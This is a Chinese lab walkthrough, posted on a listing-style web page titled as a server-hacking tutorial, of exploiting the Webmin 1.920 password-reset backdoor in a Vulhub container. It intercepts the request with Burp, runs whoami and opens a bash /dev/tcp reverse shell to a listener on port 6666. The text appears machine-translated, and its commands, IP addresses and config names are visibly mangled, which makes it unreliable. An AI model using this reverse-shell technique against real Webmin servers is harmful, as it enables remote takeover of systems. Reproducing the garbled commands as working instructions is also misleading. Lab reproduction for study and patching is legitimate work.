如何入侵服务器,黑客入侵服务器的方法与教程

2022-07-15 04:21:40  浏览:329  作者:管理员
  • 如何入侵服务器,黑客入侵服务器的方法与教程

  • 【商户信息】

  • 类目:知识大全


  • 联系人:


  • 微信号:

  • Q Q 号:

  • 手机号:

  • 浏览量:

    329


【货源详情】


漏洞描述

最近,webmin发现了远程命令执行的漏洞,分析后推测是后门嵌入事件。 webmin是目前功能最强大的基于web的unix系统管理工具,管理员通过浏览器访问webmin的各种管理功能,完成相应的管理动作,用户打开webmin密码重置功能后,攻击者通过发送post请求进行攻击

影响范围:webmin =1.920

漏洞复现

进入vuhub后,直接执行docker-compose up -d提取镜像构建

构建后,直接访问192.168.1.1:10000,但vuhub构建的网站存在问题,需要根据报告其错误的提示进行修改。 因此,在这里需要通过https进行访问。 否则,我就不访问。 https://192.168.1.1:10000/

然后利用我们的漏洞访问https://192.168.67.135336010000/password _ change.CGI。 这样的话,访问它是错误的,所以需要在这里修改配置文件。

然后进入后台修改配置文件。 这里,直接使用docker exec it id号/bin/bash

转到/etc/webmin目录以查看配置文件。 要变更的内容是config的referers_one=1的构成。

但是,docker容器没有编辑器,现在必须安装vim编辑器

cat /etc/os-release首先访问容器并检查发行版,然后决定是否使用yum或apt安装工具

可以看到您使用的debian8操作系统。 接下来是apt安装,apt install vim

然后编辑此文件config,将referers_one=1更改为referers_one=0

然后进入那个路径就知道了,这个页面也被转换成了对应的形式。 那个已经没有报告错误了。

那么接下来是使用poc再现漏洞。 这里,访问https://192.168.1.1:10000/password _ change.CGI,用burp抓住包

使用互联网上的poc,看到命令被成功执行了

poc如下所示

之后,看了效果,很明显命令执行成功了。

执行whoami。 在这里也成功输出了对应的权限

那么,反弹壳。 因为可以在此处执行执行命令,所以bash-c " bash-I/dev/TCP/192.168.1.1/666601 "将监听shell服务器的6666端口。)

那么,当执行这个命令时,我们的服务器端必须监听6666并接收反弹的外壳。 这里,需要将payload放入一个url代码中执行

那边可以接收拦截6666端口反弹回来的外壳,看到我们运行的payload。 如果右边的页面空白,说明成功了。

然后你可以看到壳牌成功反弹了。

评论区

共0条评论
  • 这篇文章还没有收到评论,赶紧来抢沙发吧~

【随机新闻】

返回顶部